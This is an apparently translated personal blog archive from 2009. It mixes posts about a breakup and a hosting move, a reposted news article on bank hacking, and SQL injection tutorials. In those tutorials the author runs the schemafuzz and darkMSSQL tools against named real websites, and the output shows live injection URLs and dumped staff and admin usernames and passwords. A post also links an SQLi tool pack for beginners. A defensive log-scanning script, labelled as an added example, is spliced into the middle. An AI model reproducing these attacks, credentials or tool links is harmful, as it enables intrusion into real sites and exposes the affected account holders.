New Place! :)

January 2, 2010

Today I safely moved my data and articles from this WordPress blog to my new hosting.

It's a relief that the hosting is now safely online.

My hosting, which is at Malcube.com, was bought during their promotion, at RM 45 per year.

The package is called the Blogger package, meant for those who want their own hosting for their blog.

This package comes with 500 MB of disk space and 10 GB of bandwidth.

So please do visit my new blog! Here is the link to my new blog:

http://zer0zam.com/

I won't update my blog on this WordPress server any more. I'll only update my new blog.

So do come and visit! 🙂

P.S.: It was suhz who promoted this package at TBD Security. :p

Thanks, suhz!


Happy New Year!

January 1, 2010

Alhamdulillah. We have safely made it through the bitter twists and turns of 2009.
Now 2010 has arrived.
A new year, with a new spirit.

You all must have had plenty of experiences last year, right?
Same here. There is a lot I'd like to share.
But never mind.


To Nurfarhana Bt. Azian,

Zam is very, very sorry if Zam has hurt Ana's feelings a lot.

Zam loves Ana. 🙂

Especially for Ana.

There once was love between us
Now only memories remain
I want to forget everything about you
But no one will ever be like you
Oh my star

You went far away and left me
Here I am missing you, oohhh
Now I try to find someone to replace you
But no one will ever be like you
Oh my love

There once was love between us
Now only memories remain
I want to forget everything about you
But no one will ever be like you
Oh my star

You went far away and left me
Here I am missing you, oohhh
Now I try to find someone to replace you
But no one will ever be like you
Oh my love

There once was love between us
Now only memories remain....

In this new year, with your new companion,
Take care of them with all your heart, Ana.
Don't repeat what happened before.
You said you wanted to change, didn't you?
So, change for real.
Let what happened during the 9 months we were together be a sweet memory (even though it was sometimes bitter). :p
Zam wishes you a happy new year.

schemafuzz tutorial

December 30, 2009

This tool is used against MySQL databases that have an error, or in other words, SQL injection! 🙂

schemafuzz.py journey... begin...

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py -h

Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs      Shows all databases user has access too.                 MySQL v5+
Define: --schema   Enumerate Information_schema Database.                   MySQL v5+
Define: --full     Enumerates all databases information_schema table        MySQL v5+
Define: --dump     Extract information from a Database, Table and Column.   MySQL v4+
Define: --fuzz     Fuzz Tables and Columns.                                 MySQL v4+
Define: --findcol  Finds Columns length of a SQLi                           MySQL v4+
Define: --info     Gets MySQL server configuration only.                    MySQL v4+

Required:
Define: -u        URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is schemafuzzlog.txt
Define: -r        row number to start at
Define: -v        Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --findcol -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8--
[+] Evasion Used: "+" "--"
[+] 01:58:30
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 0
[+] SQLi URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4--
[+] darkc0de URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4
[-] Done!

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --info -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 01:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt

[+] Do we have Access to MySQL Database: No

[+] Do we have Access to Load_File: No

[-] [01:59:58]
[-] Total URL Requests 3
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dbs -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:00:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]ruf_http
[1]test

[-] [02:00:16]
[-] Total URL Requests 4
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --schema -D ruf_http -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:01:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing Tables & Columns from database "ruf_http"
[+] Number of Tables: 6

[Database]: ruf_http
[Table: Columns]
[0]blogs: blogid,title,blog,posted,trainerid
[1]comments: commentid,name,comment,blogid,posted,approved
[2]events: eventid,name,description,date
[3]links: linkid,title,link
[4]testimonials: testimonialid,fname,lname,testimonial
[5]trainers: trainerid,fname,lname,pwd,age,bio

[-] [02:02:12]
[-] Total URL Requests 30
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C pwd -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['pwd']
[+] Number of Rows: 4

[0] Natalie
[1] glasfryn
[2] ella
[3] attack

[-] [02:04:26]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C fname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['fname']
[+] Number of Rows: 4

[0] Natalie
[1] Kathryn
[2] Sarah
[3] Craig

[-] [02:04:51]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C lname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['lname']
[+] Number of Rows: 4

[0] Sach
[1] Jones
[2] Stone
[3] O

[-] [02:05:12]
[-] Total URL Requests 6
[-] Done

Do you all understand this?

I don't think it's that hard.

Anyway, if you don't understand, you can ask me. 🙂

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂
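Seen from the web server's side, the sessions above leave a recognisable trail in the access log. The following is an added example, not part of the original post or of schemafuzz: it scans log lines for UNION SELECT requests and reports a client only when a second signal (the `darkc0de` placeholder, an always-false condition such as `AND 1=2`, an `information_schema` reference, or a select list that keeps changing width) backs it up. The log lines are constructed, and the one-request-per-column-count shape is an assumption drawn from the "Testing: 0,1,2,3,4," output.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined-log style). IPs, times and sizes are
# made up; the request shapes follow the URLs printed in the sessions above.
SAMPLE_LOG = '''\
198.51.100.9 - - [30/Dec/2009:01:57:02 +0000] "GET /trainers.php?id=8 HTTP/1.1" 200 4310
203.0.113.7 - - [30/Dec/2009:01:58:30 +0000] "GET /trainers.php?id=8+AND+1=2+UNION+SELECT+0-- HTTP/1.1" 200 977
203.0.113.7 - - [30/Dec/2009:01:58:31 +0000] "GET /trainers.php?id=8+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 977
203.0.113.7 - - [30/Dec/2009:01:58:32 +0000] "GET /trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4-- HTTP/1.1" 200 4102
203.0.113.7 - - [30/Dec/2009:01:59:55 +0000] "GET /trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4-- HTTP/1.1" 200 4102
203.0.113.7 - - [30/Dec/2009:02:01:06 +0000] "GET /trainers.php?id=8+and+1=2+union/**/select+0,table_name,2,3,4+from+information_schema.tables-- HTTP/1.1" 200 4150
198.51.100.9 - - [30/Dec/2009:02:03:00 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2210
'''

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Select list runs up to FROM, a trailing comment marker, or the end of the string.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)(?:\s+from\b|--|#|/\*|$)", re.I | re.S)
FALSE_COND_RE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)", re.I)
MARKER = "darkc0de"  # placeholder token visible in every URL on this page


def normalise(target):
    """URL-decode the query string and treat inline /**/ comments as whitespace."""
    decoded = unquote_plus(target.partition("?")[2])
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def classify(target):
    """Return (tags, column_count) for one request target."""
    text = normalise(target)
    tags, columns = set(), 0
    match = UNION_RE.search(text)
    if match:
        tags.add("union_select")
        # Naive comma split: good enough for numeric/marker lists, not nested calls.
        items = [c.strip() for c in match.group(1).split(",") if c.strip()]
        columns = len(items)
        if any(c.lower() == MARKER for c in items):
            tags.add("tool_marker")
    if any(a != b for a, b in FALSE_COND_RE.findall(text)):
        tags.add("false_condition")  # e.g. AND 1=2, which blanks the original row
    if "information_schema" in text.lower():
        tags.add("schema_enum")
    return tags, columns


def scan(log_text):
    """Report clients whose UNION SELECT requests are corroborated by a second signal."""
    clients = defaultdict(lambda: {"hits": 0, "tags": set(), "column_counts": set()})
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        tags, columns = classify(m.group(2))
        if not tags:
            continue
        entry = clients[m.group(1)]
        entry["hits"] += 1
        entry["tags"] |= tags
        if columns:
            entry["column_counts"].add(columns)
    report = {}
    for ip, e in clients.items():
        probing = len(e["column_counts"]) >= 3  # select list keeps changing width
        corroborated = e["tags"] & {"tool_marker", "false_condition", "schema_enum"}
        if "union_select" in e["tags"] and (corroborated or probing):
            report[ip] = {"hits": e["hits"], "tags": sorted(e["tags"]),
                          "column_counts": sorted(e["column_counts"]),
                          "column_probing": probing}
    return report
```

The search request containing the words "union select" is tagged but not reported, because nothing else in that client's traffic corroborates it.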

darkMSSQL tutorial

December 30, 2009

Today I want to show how to use darkMSSQL.py...

This tool is used against MSSQL databases that have an error.

darkMSSQL.py journey... begin...

-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --info -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dbs -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

Do you all understand this?

If you don't understand, you can ask me.

It's not that hard anyway. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂

Want to learn SQL Injection? hurm..

December 29, 2009

From when I first started learning SQLi until now,
I've been through many things and experiences.
I learned from 'zero' until I became who I am today.

Maybe Lyn is right.
I'm addicted.
My curiosity makes me go further.

Haha.
Anyway, I want to share with you all the tools that I think are suitable and user-friendly. 🙂

1. schemafuzz.py
2. darkMSSQL.py
3. darkPGSQLi.py
4. m4xmysql
5. Simple SQLi Dumper 1.0 (SSDp)
6. Reiluke admin finder
7. Havij 1.07

Download link : http://www.mediafire.com/?jlmwzujzfzi

So, these are the tools that I think
newbies who are interested in learning about SQL injection should use.

Tutorial?
Oh dear, I don't really have the time to make a tutorial right now.
Later, when I have time, I'll post one.
Besides, it's not that hard anyway. :p

OK, I'm off for now.
Assalamualaikum.

p/s : special thanks to those who contributed to making the scripts and tools.. 🙂

Merry Christmas to Citibank US! :)

December 26, 2009

Russian hackers ‘stole from US banks’

THE FBI is investigating the activities of a notorious Russian internet gang amid accusations that it stole tens of millions of dollars from US banks.

The hackers, known as the Russian Business Network, had been quiet for two years after masterminding a string of crimes including identity theft, fraud, spam and child pornography.

But the gang could be back in action, according to a report in The Wall Street Journal, which suggested that Citigroup was the focus of a US federal investigation linked to the Russian group.

The newspaper claimed that an attack believed to have been orchestrated by the network netted large sums of money after targeting Citigroup’s computer systems.

Reports of the cyber attack came as the White House yesterday named Howard Schmidt as its head of cyber security. Mr Schmidt, who had a similar role for several years under George Bush, will co-ordinate US government, military and intelligence efforts to repel hackers.

There has been a string of reports about hacking attacks on the US Government in recent months, as well as the theft of more than £5 million ($9 million) from systems belonging to the Royal Bank of Scotland. The threats led the US President, Barack Obama, to declare that defence against internet attacks was a “national security priority” – a shift which culminated in Mr Schmidt’s appointment.

Citigroup, the world’s largest financial services company, has rejected suggestions that the FBI is investigating an incident at the bank, and denied that a raid of such proportions had taken place.

“We had no breach of the system and there were no losses, no customer losses, no bank losses,” said Joe Petro, the managing director of Citigroup’s security and investigative services. “Any allegation that the FBI is working a case at Citigroup involving tens of millions of losses is just not true.”

Instead, a spokesman said, the company is aware of one customer whose account was drained of more than $US1 million after being hacked.

The nature of the attack remains contested, but the reports mark a significant comeback for one of the internet’s most high-profile crime groups. The organisation disappeared from view in 2007 after moving its operations from St Petersburg to China. The extended absence had left some wondering whether it had disbanded, but experts familiar with the network’s activities suggested that its influence on organised crime was still strong.

“All signs point to a dramatic rise in cyber crime,” said Anton Chuvakin, a computer security expert based in San Jose.

It would not be the first time that Citigroup or its customers had been targeted by computer criminals. Earlier this year Albert Gonzalez, a 28-year-old hacker from Florida, was charged by US prosecutors with organising a series of computer attacks that netted millions over the course of several years.

Citibank was among the groups targeted by the strikes, which resulted in more than 45 million credit card numbers being stolen.

Last weekend, it emerged that the Russian military had been meeting Washington officials to discuss potential collaboration over internet security and cyber defence. Such a move would mark a breakthrough in the often frosty relations between the two countries over their activities online.

Source: http://www.smh.com.au/technology/enterprise/russian-hackers-stole-from-us-banks-20091223-ldf9.html

P.S.: I came across this in the Utusan newspaper, I think, while I was at Hospital Serdang. That's what moved me to post this article.

Feeling it for the umpteenth time..

December 21, 2009

8.3.2009 = a date that means a great deal to me in my life. Why? The day I came to know the meaning of happiness.

I sacrificed anything for her.

But..

Is this what I should get?

Is this the reward?

On 21.12.2009, my relationship with the girl I love very much came to an end.

The reason?

Let it be that only we know the reason.

I'm very sad thinking about this.

Ahh..

Life has to go on.

Just forget about her. Your journey is still long.

Remember, you want to succeed, right? If someone doesn't like you any more, just let it be.

That's all.